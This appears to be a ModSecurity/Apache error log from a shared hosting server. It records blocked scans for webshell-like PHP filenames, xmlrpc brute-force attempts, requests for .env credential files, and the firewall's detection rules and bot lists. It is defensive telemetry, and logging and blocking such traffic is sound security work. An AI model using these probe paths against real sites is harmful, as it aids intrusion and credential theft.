[Tue May 26 14:33:58.107812 2026] [security2:error] [pid 626747:tid 626877] [client 202.141.83.254:53808] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh_RVF8Qmdmw_OMfLjnAAAAQo"]
[Tue May 26 14:33:58.498297 2026] [proxy:error] [pid 626747:tid 626964] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:58.498381 2026] [proxy_http:error] [pid 626747:tid 626964] [client 4.204.220.190:35331] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:58.499287 2026] [proxy:error] [pid 626747:tid 626964] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:33:58.499334 2026] [proxy_http:error] [pid 626747:tid 626964] [client 4.204.220.190:35331] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:33:58.499495 2026] [security2:error] [pid 626747:tid 626964] [client 4.204.220.190:35331] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahVh_hVF8Qmdmw_OMfLjqQAAAWE"]
[Tue May 26 14:33:58.793028 2026] [security2:error] [pid 626747:tid 626891] [client 4.204.220.190:21386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/xmu.php"] [unique_id "ahVh_hVF8Qmdmw_OMfLjqwAAARg"]
[Tue May 26 14:33:58.793162 2026] [security2:error] [pid 626747:tid 626891] [client 4.204.220.190:21386] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/xmu.php"] [unique_id "ahVh_hVF8Qmdmw_OMfLjqwAAARg"]
[Tue May 26 14:33:59.106534 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:38616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/mode.php"] [unique_id "ahVh_xVF8Qmdmw_OMfLj0wAAAWI"]
[Tue May 26 14:33:59.106653 2026] [security2:error] [pid 626747:tid 626965] [client 4.204.220.190:38616] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/mode.php"] [unique_id "ahVh_xVF8Qmdmw_OMfLj0wAAAWI"]
[Tue May 26 14:33:59.474071 2026] [security2:error] [pid 626747:tid 626889] [client 4.204.220.190:12640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVh_xVF8Qmdmw_OMfLj4QAAARY"]
[Tue May 26 14:33:59.474180 2026] [security2:error] [pid 626747:tid 626889] [client 4.204.220.190:12640] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahVh_xVF8Qmdmw_OMfLj4QAAARY"]
[Tue May 26 14:33:59.967791 2026] [security2:error] [pid 626747:tid 626978] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh_xVF8Qmdmw_OMfLj5AAAAW8"]
[Tue May 26 14:34:00.094491 2026] [security2:error] [pid 626747:tid 626960] [client 4.204.220.190:12665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/dx.php"] [unique_id "ahViABVF8Qmdmw_OMfLj9wAAAV0"]
[Tue May 26 14:34:00.094593 2026] [security2:error] [pid 626747:tid 626960] [client 4.204.220.190:12665] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/dx.php"] [unique_id "ahViABVF8Qmdmw_OMfLj9wAAAV0"]
[Tue May 26 14:34:00.403318 2026] [security2:error] [pid 626747:tid 626896] [client 4.204.220.190:12461] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/puc.php"] [unique_id "ahViABVF8Qmdmw_OMfLj-wAAAR0"]
[Tue May 26 14:34:00.403436 2026] [security2:error] [pid 626747:tid 626896] [client 4.204.220.190:12461] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/puc.php"] [unique_id "ahViABVF8Qmdmw_OMfLj-wAAAR0"]
[Tue May 26 14:34:01.434463 2026] [security2:error] [pid 626747:tid 626880] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViABVF8Qmdmw_OMfLkCwAAAQ0"]
[Tue May 26 14:34:02.331077 2026] [security2:error] [pid 626747:tid 626897] [client 4.204.220.190:65374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/themes.php"] [unique_id "ahViAhVF8Qmdmw_OMfLkKgAAAR4"]
[Tue May 26 14:34:02.331179 2026] [security2:error] [pid 626747:tid 626897] [client 4.204.220.190:65374] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/themes.php"] [unique_id "ahViAhVF8Qmdmw_OMfLkKgAAAR4"]
[Tue May 26 14:34:03.439963 2026] [security2:error] [pid 626747:tid 626906] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViAhVF8Qmdmw_OMfLkNQAAASc"]
[Tue May 26 14:34:03.516887 2026] [security2:error] [pid 626747:tid 626887] [client 4.204.220.190:38630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/dx.php"] [unique_id "ahViAxVF8Qmdmw_OMfLkSQAAARQ"]
[Tue May 26 14:34:03.517026 2026] [security2:error] [pid 626747:tid 626887] [client 4.204.220.190:38630] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/dx.php"] [unique_id "ahViAxVF8Qmdmw_OMfLkSQAAARQ"]
[Tue May 26 14:34:03.923247 2026] [security2:error] [pid 626747:tid 626842] [remote 74.7.241.58:44616] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahViAxVF8Qmdmw_OMfLkUwABYF4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/jv
[Tue May 26 14:34:04.108711 2026] [security2:error] [pid 626747:tid 626933] [client 4.204.220.190:65365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/11.php"] [unique_id "ahViBBVF8Qmdmw_OMfLkVwAAAUI"]
[Tue May 26 14:34:04.108821 2026] [security2:error] [pid 626747:tid 626933] [client 4.204.220.190:65365] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/11.php"] [unique_id "ahViBBVF8Qmdmw_OMfLkVwAAAUI"]
[Tue May 26 14:34:04.729168 2026] [security2:error] [pid 626747:tid 626943] [client 47.128.36.58:25232] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/robots.txt"] [unique_id "ahViBBVF8Qmdmw_OMfLkXQAAAUw"]
[Tue May 26 14:34:05.429643 2026] [security2:error] [pid 626747:tid 626950] [client 154.161.32.97:46545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkagAAAVM"]
[Tue May 26 14:34:05.429832 2026] [security2:error] [pid 626747:tid 626950] [client 154.161.32.97:46545] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkagAAAVM"]
[Tue May 26 14:34:05.433063 2026] [security2:error] [pid 626747:tid 626995] [client 4.204.220.190:45499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/p.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkbwAAAYA"]
[Tue May 26 14:34:05.433167 2026] [security2:error] [pid 626747:tid 626995] [client 4.204.220.190:45499] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/p.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkbwAAAYA"]
[Tue May 26 14:34:06.023270 2026] [security2:error] [pid 626747:tid 626972] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkdAAAAWk"]
[Tue May 26 14:34:06.076823 2026] [security2:error] [pid 626747:tid 626987] [client 150.107.5.176:2579] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahViBRVF8Qmdmw_OMfLkfQAAAXg"]
[Tue May 26 14:34:06.409613 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:34:06.409681 2026] [proxy_http:error] [pid 626747:tid 626969] [client 4.204.220.190:21277] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:34:06.410251 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:34:06.410282 2026] [proxy_http:error] [pid 626747:tid 626969] [client 4.204.220.190:21277] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:34:06.410372 2026] [security2:error] [pid 626747:tid 626969] [client 4.204.220.190:21277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "503"] [hostname "cpcontacts.bramas.in"] [uri "/___proxy_subdomain_cpcontacts/cgi-sys/503.html"] [unique_id "ahViBhVF8Qmdmw_OMfLkkgAAAWY"]
[Tue May 26 14:34:07.987386 2026] [security2:error] [pid 626747:tid 627002] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViBxVF8Qmdmw_OMfLkqwAAAYc"]
[Tue May 26 14:34:08.105376 2026] [security2:error] [pid 626747:tid 626925] [client 4.204.220.190:21694] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/bthil.php"] [unique_id "ahViCBVF8Qmdmw_OMfLkugAAATo"]
[Tue May 26 14:34:08.105497 2026] [security2:error] [pid 626747:tid 626925] [client 4.204.220.190:21694] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/bthil.php"] [unique_id "ahViCBVF8Qmdmw_OMfLkugAAATo"]
[Tue May 26 14:34:08.341291 2026] [security2:error] [pid 626747:tid 626966] [client 85.208.96.203:32828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahViCBVF8Qmdmw_OMfLkwwAAAWM"]
[Tue May 26 14:34:08.341433 2026] [security2:error] [pid 626747:tid 626966] [client 85.208.96.203:32828] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahViCBVF8Qmdmw_OMfLkwwAAAWM"]
[Tue May 26 14:34:08.422220 2026] [security2:error] [pid 626747:tid 626900] [client 202.141.83.254:5794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViCBVF8Qmdmw_OMfLkxwAAASE"]
[Tue May 26 14:34:08.422356 2026] [security2:error] [pid 626747:tid 626900] [client 202.141.83.254:5794] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViCBVF8Qmdmw_OMfLkxwAAASE"]
[Tue May 26 14:34:09.017108 2026] [security2:error] [pid 626747:tid 626919] [client 4.204.220.190:65368] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/7.php"] [unique_id "ahViCRVF8Qmdmw_OMfLk0gAAATQ"]
[Tue May 26 14:34:09.017249 2026] [security2:error] [pid 626747:tid 626919] [client 4.204.220.190:65368] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/7.php"] [unique_id "ahViCRVF8Qmdmw_OMfLk0gAAATQ"]
[Tue May 26 14:34:10.276228 2026] [security2:error] [pid 626747:tid 626939] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViCRVF8Qmdmw_OMfLk5AAAAUg"]
[Tue May 26 14:34:12.619836 2026] [security2:error] [pid 626747:tid 626909] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViDBVF8Qmdmw_OMfLlGwAAASo"]
[Tue May 26 14:34:13.204743 2026] [security2:error] [pid 626747:tid 626983] [client 114.119.138.32:55821] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/financials"] [unique_id "ahViDRVF8Qmdmw_OMfLlOwAAAXQ"], referer: https://panda-eco.com/financials
[Tue May 26 14:34:14.287453 2026] [security2:error] [pid 626747:tid 626979] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViDRVF8Qmdmw_OMfLlUwAAAXA"]
[Tue May 26 14:34:16.387718 2026] [security2:error] [pid 626747:tid 626879] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViDxVF8Qmdmw_OMfLllAAAAQw"]
[Tue May 26 14:34:17.676404 2026] [security2:error] [pid 626747:tid 626994] [client 85.208.96.210:39514] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahViERVF8Qmdmw_OMfLlygAAAX8"]
[Tue May 26 14:34:17.676682 2026] [security2:error] [pid 626747:tid 626994] [client 85.208.96.210:39514] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahViERVF8Qmdmw_OMfLlygAAAX8"]
[Tue May 26 14:34:17.969837 2026] [security2:error] [pid 626747:tid 626919] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViERVF8Qmdmw_OMfLlyQAAATQ"]
[Tue May 26 14:34:17.982809 2026] [security2:error] [pid 626747:tid 626924] [client 195.2.67.184:56218] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "195.2.67.184" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahViERVF8Qmdmw_OMfLl1AAAATk"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:34:17.982907 2026] [security2:error] [pid 626747:tid 626924] [client 195.2.67.184:56218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahViERVF8Qmdmw_OMfLl1AAAATk"], referer: https://www.bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 14:34:18.304432 2026] [security2:error] [pid 626747:tid 626985] [client 185.191.171.7:58738] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahViEhVF8Qmdmw_OMfLl1wAAAXY"]
[Tue May 26 14:34:18.304548 2026] [security2:error] [pid 626747:tid 626985] [client 185.191.171.7:58738] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahViEhVF8Qmdmw_OMfLl1wAAAXY"]
[Tue May 26 14:34:18.854878 2026] [security2:error] [pid 626747:tid 626954] [client 202.141.83.254:53939] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViEhVF8Qmdmw_OMfLl5wAAAVc"]
[Tue May 26 14:34:18.854982 2026] [security2:error] [pid 626747:tid 626954] [client 202.141.83.254:53939] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahViEhVF8Qmdmw_OMfLl5wAAAVc"]
[Tue May 26 14:34:19.049876 2026] [security2:error] [pid 626747:tid 626883] [client 85.11.167.19:54018] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahViExVF8Qmdmw_OMfLl6QAAARA"]
[Tue May 26 14:34:19.837281 2026] [security2:error] [pid 626747:tid 626920] [client 85.11.167.19:54022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "vcresco.com"] [uri "/"] [unique_id "ahViExVF8Qmdmw_OMfLmBAAAATU"]
[Tue May 26 14:34:20.002400 2026] [security2:error] [pid 626747:tid 626996] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahViExVF8Qmdmw_OMfLl-gAAAYE"]
[Tue May 26 14:34:21.402236 2026] [security2:error] [pid 626747:tid 626999] [client 85.11.167.19:54038] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "vcresco-usa.vcresco.com"] [uri "/.env"] [unique_id "ahViFRVF8Qmdmw_OMfLmLgAAAYQ"]
[Tue May 26 14:34:22.283417 2026] [security2:error] [pid 626747:tid 626956] [client 85.11.167.19:54054] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "vcresco-usa.vcresco.com"] [uri "/"] [unique_id "ahViFhVF8Qmdmw_OMfLmVgAAAVk"]
